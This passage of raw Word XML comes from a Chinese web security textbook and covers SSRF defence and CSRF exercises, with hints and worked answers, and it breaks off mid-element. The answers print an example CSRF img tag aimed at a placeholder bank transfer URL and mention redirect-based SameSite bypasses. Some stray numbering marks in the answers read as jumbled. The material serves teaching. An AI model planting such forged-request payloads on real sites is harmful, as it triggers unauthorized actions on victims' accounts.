          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">带外信道构成威胁。因此修复策略不应假设“无回显即安全”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的防御难度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">精确根治不同，SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的修复更多依赖于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">多层网络的纵深防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严格的白名单校验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“允许服务器访问的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">集合”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">准确建模了业务需求，任何松懈都可能被利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题、小结与延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题（提取题）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击依赖浏览器的哪一行为？若一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用将认证令牌由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头，且前端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在每次请求时显式附加该头，能否天然抵御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF？为什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：解释</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御的差异。为何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有效，但对使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能无效？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心危害并非攻击者“看到”了什么，而是服务器“能去到哪里”。请简述：为何同一公司同一内部网络中，一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器可访问的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和数据库，对来自互联网的外部攻击者是隔离的，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">却能打破该隔离？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1：对比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie（浏览器自动附带）与手动附加的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Header（需要跨站页面主动构造——但这本身被同源策略限制，无法跨站读取服务端存储的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值）。题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2：关注“顶级导航”（Top-level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">navigation）的定义——从地址栏或点击链接触发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求属于顶级导航，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会附</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie；而由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发的不属于。题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3：回溯防火墙与网络分段的基本假设：入站规则阻止外部访问内网，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的出站请求源自可信任区域，受信任——SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正是滥用这一“信任”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依赖浏览器自动在跨站请求中附加目标域</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。若使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头并存储于内存（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage），且由前端在每次请求时显式附上，则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">天然无法成立——因为第三方页面既不能读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage（同源策略），也无法强制浏览器跨站附加自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Header（除非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置允许，且预检请求通过）。必须注意：若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仍存储于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中只是以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取再放入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Header，则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身的自动附带行为依然可能被利用（需配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性）。②环境相关：现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SPA（Single</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application，单页应用）常用此模式，CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险相对传统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话认证显著降低。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完全禁止在任何跨站请求中发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，包括从外部链接点击跳转（用户从邮件点链接打开站点时，Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不被附加，需重新登录——用户体验差）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅在“顶级导航”GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中允许附</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie（用户点击链接可以），但阻止由脚本触发的请求（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单提交、或嵌入资源（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附着。然而，若攻击者以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="https://bank.com/transfer?to=X&amp;amount=Y"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF，该请求是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GET——但并非顶级导航，因此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样阻止其附带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。在正确的浏览器实现下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对典型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向量均有防御力；其被绕过的场景通常是：攻击者可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> window.open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 302 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向将恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪装为顶级导航（③示意，具体行为因浏览器实现略有差异②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
